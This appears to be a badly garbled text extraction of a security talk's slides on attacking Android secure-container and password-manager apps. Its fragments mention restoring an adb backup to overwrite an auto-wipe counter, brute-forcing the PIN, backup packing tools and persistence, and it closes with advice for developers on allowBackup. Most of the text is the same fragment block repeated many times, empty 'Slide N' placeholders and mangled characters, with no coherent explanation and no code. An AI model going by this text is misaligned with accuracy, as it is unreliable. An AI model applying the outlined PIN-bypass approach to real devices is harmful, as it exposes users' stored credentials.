Minimize keyspace





herersquos one I

Made earlier


>


PROFIT


4

][Makıngit easy


methodology


















automatıon


Pythontothe rescue


ab_unpackerpy



ab_packerpy



Makes 0wning things


200 quicker

1000 funner

oo

oo


Bonus

n0t a bug





exploit










METHOD

1


Reinstall flag




METHOD

2


Uninstall Reinstall





exploit


derpppp

derp

DerpderpDERPDE

RPderp

derp

Derpderp DE

RP

derp DerpderP


5

][ RE

VIEW



=SECURE containers


Physıcal access


Devıcesecurity


Datasecurity


51

)( ITFIX


specificissues


lastpass


spideroak


boxcom


GOODfor enterprise


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253




PROBLEM

1


unlike LastPass


preferences are

encrypted


PROBLEM

2




Disable PIN


auto-wipe counter


brute-force


buthellip



AndroidManifestxml

DE

RP


THEORY

1


Theory



THEORY

2


adb restore


over writeauto-wipe

counter


facepalm


brute-force


Naiumlve Attack




PROBLEM

3





















Device

CONTAINER


Device

CONTAINER


Device

CONTAINER

facepalm

facepalm


Adv Attack



Minimize keyspace





herersquos one I

Made earlier


>


PROFIT


4

][Makıngit easy


methodology


















automatıon


Pythontothe rescue


ab_unpackerpy



ab_packerpy



Makes 0wning things


200 quicker

1000 funner

oo

oo


Bonus

n0t a bug





exploit










METHOD

1


Reinstall flag




METHOD

2


Uninstall Reinstall





exploit


derpppp

derp

DerpderpDERPDE

RPderp

derp

Derpderp DE

RP

derp DerpderP


5

][ RE

VIEW



=SECURE containers


Physıcal access


Devıcesecurity


Datasecurity


51

)( ITFIX


specificissues


lastpass


spideroak


boxcom


GOODfor enterprise


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253


unlike LastPass


preferences are

encrypted


PROBLEM

2




Disable PIN


auto-wipe counter


brute-force


buthellip



AndroidManifestxml

DE

RP


THEORY

1


Theory



THEORY

2


adb restore


over writeauto-wipe

counter


facepalm


brute-force


Naiumlve Attack




PROBLEM

3





















Device

CONTAINER


Device

CONTAINER


Device

CONTAINER

facepalm

facepalm


Adv Attack



Minimize keyspace





herersquos one I

Made earlier


>


PROFIT


4

][Makıngit easy


methodology


















automatıon


Pythontothe rescue


ab_unpackerpy



ab_packerpy



Makes 0wning things


200 quicker

1000 funner

oo

oo


Bonus

n0t a bug





exploit










METHOD

1


Reinstall flag




METHOD

2


Uninstall Reinstall





exploit


derpppp

derp

DerpderpDERPDE

RPderp

derp

Derpderp DE

RP

derp DerpderP


5

][ RE

VIEW



=SECURE containers


Physıcal access


Devıcesecurity


Datasecurity


51

)( ITFIX


specificissues


lastpass


spideroak


boxcom


GOODfor enterprise


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253


preferences are

encrypted


PROBLEM

2




Disable PIN


auto-wipe counter


brute-force


buthellip



AndroidManifestxml

DE

RP


THEORY

1


Theory



THEORY

2


adb restore


over writeauto-wipe

counter


facepalm


brute-force


Naiumlve Attack




PROBLEM

3





















Device

CONTAINER


Device

CONTAINER


Device

CONTAINER

facepalm

facepalm


Adv Attack



Minimize keyspace





herersquos one I

Made earlier


>


PROFIT


4

][Makıngit easy


methodology


















automatıon


Pythontothe rescue


ab_unpackerpy



ab_packerpy



Makes 0wning things


200 quicker

1000 funner

oo

oo


Bonus

n0t a bug





exploit










METHOD

1


Reinstall flag




METHOD

2


Uninstall Reinstall





exploit


derpppp

derp

DerpderpDERPDE

RPderp

derp

Derpderp DE

RP

derp DerpderP


5

][ RE

VIEW



=SECURE containers


Physıcal access


Devıcesecurity


Datasecurity


51

)( ITFIX


specificissues


lastpass


spideroak


boxcom


GOODfor enterprise


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253


PROBLEM

2




Disable PIN


auto-wipe counter


brute-force


buthellip



AndroidManifestxml

DE

RP


THEORY

1


Theory



THEORY

2


adb restore


over writeauto-wipe

counter


facepalm


brute-force


Naiumlve Attack




PROBLEM

3





















Device

CONTAINER


Device

CONTAINER


Device

CONTAINER

facepalm

facepalm


Adv Attack



Minimize keyspace





herersquos one I

Made earlier


>


PROFIT


4

][Makıngit easy


methodology


















automatıon


Pythontothe rescue


ab_unpackerpy



ab_packerpy



Makes 0wning things


200 quicker

1000 funner

oo

oo


Bonus

n0t a bug





exploit










METHOD

1


Reinstall flag




METHOD

2


Uninstall Reinstall





exploit


derpppp

derp

DerpderpDERPDE

RPderp

derp

Derpderp DE

RP

derp DerpderP


5

][ RE

VIEW



=SECURE containers


Physıcal access


Devıcesecurity


Datasecurity


51

)( ITFIX


specificissues


lastpass


spideroak


boxcom


GOODfor enterprise


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253




Disable PIN


auto-wipe counter


brute-force


buthellip



AndroidManifestxml

DE

RP


THEORY

1


Theory



THEORY

2


adb restore


over writeauto-wipe

counter


facepalm


brute-force


Naiumlve Attack




PROBLEM

3





















Device

CONTAINER


Device

CONTAINER


Device

CONTAINER

facepalm

facepalm


Adv Attack



Minimize keyspace





herersquos one I

Made earlier


>


PROFIT


4

][Makıngit easy


methodology


















automatıon


Pythontothe rescue


ab_unpackerpy



ab_packerpy



Makes 0wning things


200 quicker

1000 funner

oo

oo


Bonus

n0t a bug





exploit










METHOD

1


Reinstall flag




METHOD

2


Uninstall Reinstall





exploit


derpppp

derp

DerpderpDERPDE

RPderp

derp

Derpderp DE

RP

derp DerpderP


5

][ RE

VIEW



=SECURE containers


Physıcal access


Devıcesecurity


Datasecurity


51

)( ITFIX


specificissues


lastpass


spideroak


boxcom


GOODfor enterprise


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253


auto-wipe counter


brute-force


buthellip



AndroidManifestxml

DE

RP


THEORY

1


Theory



THEORY

2


adb restore


over writeauto-wipe

counter


facepalm


brute-force


Naiumlve Attack




PROBLEM

3





















Device

CONTAINER


Device

CONTAINER


Device

CONTAINER

facepalm

facepalm


Adv Attack



Minimize keyspace





herersquos one I

Made earlier


>


PROFIT


4

][Makıngit easy


methodology


















automatıon


Pythontothe rescue


ab_unpackerpy



ab_packerpy



Makes 0wning things


200 quicker

1000 funner

oo

oo


Bonus

n0t a bug





exploit










METHOD

1


Reinstall flag




METHOD

2


Uninstall Reinstall





exploit


derpppp

derp

DerpderpDERPDE

RPderp

derp

Derpderp DE

RP

derp DerpderP


5

][ RE

VIEW



=SECURE containers


Physıcal access


Devıcesecurity


Datasecurity


51

)( ITFIX


specificissues


lastpass


spideroak


boxcom


GOODfor enterprise


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253


brute-force


buthellip



AndroidManifestxml

DE

RP


THEORY

1


Theory



THEORY

2


adb restore


over writeauto-wipe

counter


facepalm


brute-force


Naiumlve Attack




PROBLEM

3





















Device

CONTAINER


Device

CONTAINER


Device

CONTAINER

facepalm

facepalm


Adv Attack



Minimize keyspace





herersquos one I

Made earlier


>


PROFIT


4

][Makıngit easy


methodology


















automatıon


Pythontothe rescue


ab_unpackerpy



ab_packerpy



Makes 0wning things


200 quicker

1000 funner

oo

oo


Bonus

n0t a bug





exploit










METHOD

1


Reinstall flag




METHOD

2


Uninstall Reinstall





exploit


derpppp

derp

DerpderpDERPDE

RPderp

derp

Derpderp DE

RP

derp DerpderP


5

][ RE

VIEW



=SECURE containers


Physıcal access


Devıcesecurity


Datasecurity


51

)( ITFIX


specificissues


lastpass


spideroak


boxcom


GOODfor enterprise


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

